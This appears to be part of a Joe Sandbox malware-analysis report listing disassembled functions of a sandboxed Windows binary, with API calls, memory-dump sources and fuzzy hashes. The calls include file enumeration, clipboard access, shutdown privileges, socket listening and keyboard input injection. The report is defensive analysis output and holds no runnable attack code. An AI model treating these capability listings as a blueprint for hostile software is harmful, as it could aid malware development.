                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F131B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00F131DA
                                                                                                                                  • Part of subcall function 00F57B9F: __wsplitpath.LIBCMT ref: 00F57BBC
                                                                                                                                  • Part of subcall function 00F57B9F: __wsplitpath.LIBCMT ref: 00F57BCF
                                                                                                                                  • Part of subcall function 00F57C0C: GetFileAttributesW.KERNEL32(?,00F56A7B), ref: 00F57C0D
                                                                                                                                • _wcscat.LIBCMT ref: 00F56B9D
                                                                                                                                • _wcscat.LIBCMT ref: 00F56BBB
                                                                                                                                • __wsplitpath.LIBCMT ref: 00F56BE2
                                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00F56BF8
                                                                                                                                • _wcscpy.LIBCMT ref: 00F56C57
                                                                                                                                • _wcscat.LIBCMT ref: 00F56C6A
                                                                                                                                • _wcscat.LIBCMT ref: 00F56C7D
                                                                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 00F56CAB
                                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F56D37
                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00F56D53
                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00F56D61
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Find_wcscat$File__wsplitpath$Close$AttributesFirstFullNameNextPath_wcscpylstrcmpi
                                                                                                                                • String ID: \*.*
                                                                                                                                • API String ID: 481317943-1173974218
                                                                                                                                • Opcode ID: 0565209e0eef2580920237c5610e88deeb1a50e6c20681c0a4bd6dcdbb176518
                                                                                                                                • Instruction ID: 1209078f28b30e49bf63f3d534d7179ee2db961b51f134ee4bb7a926e6b62caf
                                                                                                                                • Opcode Fuzzy Hash: 0565209e0eef2580920237c5610e88deeb1a50e6c20681c0a4bd6dcdbb176518
                                                                                                                                • Instruction Fuzzy Hash: 2F511D7290421CAADB21EBA0DC44EEE777CAF05315F4445D6EA59E3041DB349B8CEF61
                                                                                                                                Function 00F56E4A Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85fileCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F131B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00F131DA
                                                                                                                                  • Part of subcall function 00F57C0C: GetFileAttributesW.KERNEL32(?,00F56A7B), ref: 00F57C0D
                                                                                                                                • _wcscat.LIBCMT ref: 00F56E7E
                                                                                                                                • __wsplitpath.LIBCMT ref: 00F56E99
                                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00F56EAE
                                                                                                                                • _wcscpy.LIBCMT ref: 00F56EDD
                                                                                                                                • _wcscat.LIBCMT ref: 00F56EEF
                                                                                                                                • _wcscat.LIBCMT ref: 00F56F01
                                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F56F22
                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00F56F3D
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileFind_wcscat$AttributesCloseFirstFullNameNextPath__wsplitpath_wcscpy
                                                                                                                                • String ID: \*.*
                                                                                                                                • API String ID: 1343497842-1173974218
                                                                                                                                • Opcode ID: 19f2caa16d04486bf32ccfdf49969f8ef2044179f2de16b5111932cda921619d
                                                                                                                                • Instruction ID: dc2ba16514e87d2eb00e2f97b9b0e22e309aad9dfb9033c22791a6408ebe2f1c
                                                                                                                                • Opcode Fuzzy Hash: 19f2caa16d04486bf32ccfdf49969f8ef2044179f2de16b5111932cda921619d
                                                                                                                                • Instruction Fuzzy Hash: D6219572809344AEC610EBA4DC459DF7BDCAF59224F444A1AF9E4C3051EB34D64DA762
                                                                                                                                Function 00F67294 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1737998785-0
                                                                                                                                • Opcode ID: 36d71e17ba551c62605cdcab45f9a786bc80d9dbfcda95072a167741d6b61fe8
                                                                                                                                • Instruction ID: 00d340e25ba5afad786953eb7e409d3929d71141b1b6e7bdbd758eb7bbd7d89e
                                                                                                                                • Opcode Fuzzy Hash: 36d71e17ba551c62605cdcab45f9a786bc80d9dbfcda95072a167741d6b61fe8
                                                                                                                                • Instruction Fuzzy Hash: 2621E231604214AFDB10BF20EC1AB2D7BA8FF44725F10801AF90ADB261DB38ED40BB94
                                                                                                                                Function 00F624A9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 119filesleepCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F1CAEE: _memmove.LIBCMT ref: 00F1CB2F
                                                                                                                                • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00F624F6
                                                                                                                                • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00F62526
                                                                                                                                • _wcscmp.LIBCMT ref: 00F6253A
                                                                                                                                • _wcscmp.LIBCMT ref: 00F62555
                                                                                                                                • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00F625F3
                                                                                                                                • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00F62609
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                                                                • String ID: *.*
                                                                                                                                • API String ID: 713712311-438819550
                                                                                                                                • Opcode ID: bd001606c64b2ab091ebc46eafda089e235dd8ef449e7eed3195299fbda95b20
                                                                                                                                • Instruction ID: 03aa9be5c6721fb36bd5cde33c7a5337c0c033649bb10e4bf028ea28a7eeb67d
                                                                                                                                • Opcode Fuzzy Hash: bd001606c64b2ab091ebc46eafda089e235dd8ef449e7eed3195299fbda95b20
                                                                                                                                • Instruction Fuzzy Hash: 7E41AE71D0061AAFCF64DFA4CD49AEEBBB4FF04310F244056E816A2191EB359E84EF90
                                                                                                                                Function 00F18CA0 Relevance: 11.6, APIs: 1, Strings: 5, Instructions: 1058COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                                                                • API String ID: 0-1546025612
                                                                                                                                • Opcode ID: 6403b6c2a81441c482b4cf8a17e567a6965e1030b50bd66f36146378f2976857
                                                                                                                                • Instruction ID: c521eda8037bcfae25c7ed7218c72672e0d56137d37b4e595b0ad52ae16c071e
                                                                                                                                • Opcode Fuzzy Hash: 6403b6c2a81441c482b4cf8a17e567a6965e1030b50bd66f36146378f2976857
                                                                                                                                • Instruction Fuzzy Hash: DC926D71E0421ACBEF24CF68C9607EDB7B1BB54324F1441AAD859A7280D7B49DC1EF91
                                                                                                                                Function 00F18530 Relevance: 11.0, APIs: 7, Instructions: 531COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _memmove
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4104443479-0
                                                                                                                                • Opcode ID: cc24c0f99e5d182e418119df561939fcb4fee027a6b45c65fed762546dd9a9e7
                                                                                                                                • Instruction ID: 9ab6ffbf969d356f27eee6853016d91b8eaa69b507a752e3b29eb0f1b75abef2
                                                                                                                                • Opcode Fuzzy Hash: cc24c0f99e5d182e418119df561939fcb4fee027a6b45c65fed762546dd9a9e7
                                                                                                                                • Instruction Fuzzy Hash: 5E127971A00609DFDF44DFA4DA81AEEB7F5FF48310F204529E806E7290EB39A951EB54
                                                                                                                                Function 00F582D0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F4BEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F4BF0F
                                                                                                                                  • Part of subcall function 00F4BEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F4BF3C
                                                                                                                                  • Part of subcall function 00F4BEC3: GetLastError.KERNEL32 ref: 00F4BF49
                                                                                                                                • ExitWindowsEx.USER32(?,00000000), ref: 00F5830C
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                • String ID: $@$SeShutdownPrivilege
                                                                                                                                • API String ID: 2234035333-194228
                                                                                                                                • Opcode ID: 77a8f11bee5a9af3f3cf0f140cd49d9534bbbed13960e66edbed6b5b2424d163
                                                                                                                                • Instruction ID: d0db64ebdbe690e8f9ef3d4b2d227aa86ac853d7e2a4046ed45a335f3c56c320
                                                                                                                                • Opcode Fuzzy Hash: 77a8f11bee5a9af3f3cf0f140cd49d9534bbbed13960e66edbed6b5b2424d163
                                                                                                                                • Instruction Fuzzy Hash: 8901A772B44315ABE76817788C4BBBB76589B00BD2F240425FF53F20E2DE649C0BB1A4
                                                                                                                                Function 00F691DC Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00F69235
                                                                                                                                • WSAGetLastError.WS2_32(00000000), ref: 00F69244
                                                                                                                                • bind.WS2_32(00000000,?,00000010), ref: 00F69260
                                                                                                                                • listen.WS2_32(00000000,00000005), ref: 00F6926F
                                                                                                                                • WSAGetLastError.WS2_32(00000000), ref: 00F69289
                                                                                                                                • closesocket.WS2_32(00000000), ref: 00F6929D
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1279440585-0
                                                                                                                                • Opcode ID: c7f55920e3999a76c5b77eaf00b2fb50e09872cd0a4ac9296b1668ba8ee0a76e
                                                                                                                                • Instruction ID: 294c3511ce28ebfc9f49c9c4b5df8fb35e9a08834bdcc2362754aa8735574c9c
                                                                                                                                • Opcode Fuzzy Hash: c7f55920e3999a76c5b77eaf00b2fb50e09872cd0a4ac9296b1668ba8ee0a76e
                                                                                                                                • Instruction Fuzzy Hash: 2621F131600204AFCB10EF64DD95B6EB7ACEF48324F208119F916A73D1CB78AD45EB52
                                                                                                                                Function 00F1A0C0 Relevance: 8.0, APIs: 5, Instructions: 514COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F3010A: std::exception::exception.LIBCMT ref: 00F3013E
                                                                                                                                  • Part of subcall function 00F3010A: __CxxThrowException@8.LIBCMT ref: 00F30153
                                                                                                                                • _memmove.LIBCMT ref: 00F83020
                                                                                                                                • _memmove.LIBCMT ref: 00F83135
                                                                                                                                • _memmove.LIBCMT ref: 00F831DC
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1300846289-0
                                                                                                                                • Opcode ID: 44496902cae401d3f4db81d8532b57c703d896d5990e3a71704c26b2a6ac8dd6
                                                                                                                                • Instruction ID: 145789d897d510c4ab8df2ddc26fe70cff0ff25227d451c3dbe287939058c72a
                                                                                                                                • Opcode Fuzzy Hash: 44496902cae401d3f4db81d8532b57c703d896d5990e3a71704c26b2a6ac8dd6
                                                                                                                                • Instruction Fuzzy Hash: DF02E370E00209DFCF04EF64D982AAEB7F5EF48710F148069E806DB295EB35DA55EB91
                                                                                                                                Function 00F696E2 Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F6ACD3: inet_addr.WS2_32(00000000), ref: 00F6ACF5
                                                                                                                                • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00F6973D
                                                                                                                                • WSAGetLastError.WS2_32(00000000,00000000), ref: 00F69760
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLastinet_addrsocket
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4170576061-0
                                                                                                                                • Opcode ID: c858c57e819bc840f09b7a1ad2482b98549980b8266f5952d0917d4d0441e9d5
                                                                                                                                • Instruction ID: 0b4bf7f010d09d1d17d1d8b1bb8db5382112168c0c43ce1b8de1aff57c7fe78a
                                                                                                                                • Opcode Fuzzy Hash: c858c57e819bc840f09b7a1ad2482b98549980b8266f5952d0917d4d0441e9d5
                                                                                                                                • Instruction Fuzzy Hash: 4B41E670600214AFDB10EF64DC82E6E77EDEF44324F148149F956AB392CB78AD41AB91
                                                                                                                                Function 00F5F350 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00F5F37A
                                                                                                                                • _wcscmp.LIBCMT ref: 00F5F3AA
                                                                                                                                • _wcscmp.LIBCMT ref: 00F5F3BF
                                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00F5F3D0
                                                                                                                                • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00F5F3FE
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2387731787-0
                                                                                                                                • Opcode ID: 3728ae0f630177092384505b563d88158c987a5a31e69826b259d41260479247
                                                                                                                                • Instruction ID: 2c07a53d88049fc8de8b3254d1c6cd8b8bdd37cce4308a4f171accaca84138b0
                                                                                                                                • Opcode Fuzzy Hash: 3728ae0f630177092384505b563d88158c987a5a31e69826b259d41260479247
                                                                                                                                • Instruction Fuzzy Hash: B841A135A043019FC708DF28C891E9AB7E4FF49324F10416EEA5ACB3A1DB35E949DB91
                                                                                                                                Function 00F54342 Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00F5439C
                                                                                                                                • SetKeyboardState.USER32(00000080,?,00000001), ref: 00F543B8
                                                                                                                                • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00F54425
                                                                                                                                • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00F54483
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 432972143-0
                                                                                                                                • Opcode ID: 3c93c0972dc64fe84fa03556bad172bad27760e43098c96f8b4d037cb5e04068
                                                                                                                                • Instruction ID: ff7e582694e73d8a0dbe88c75005fd7ec7a623e033cb0b0db819c9a02fe7e801
                                                                                                                                • Opcode Fuzzy Hash: 3c93c0972dc64fe84fa03556bad172bad27760e43098c96f8b4d037cb5e04068
                                                                                                                                • Instruction Fuzzy Hash: 4C410671D44248AAEF24CB6498047FD7BB5AB4532BF04011AEE81932C1C778A9CDB761
                                                                                                                                Function 00F7EFA8 Relevance: 6.1, APIs: 4, Instructions: 80nativewindowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F2AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00F2AF8E
                                                                                                                                • GetCursorPos.USER32(?), ref: 00F7EFE2
                                                                                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00F8F3C3,?,?,?,?,?), ref: 00F7EFF7
                                                                                                                                • GetCursorPos.USER32(?), ref: 00F7F041
                                                                                                                                • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,00F8F3C3,?,?,?), ref: 00F7F077
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
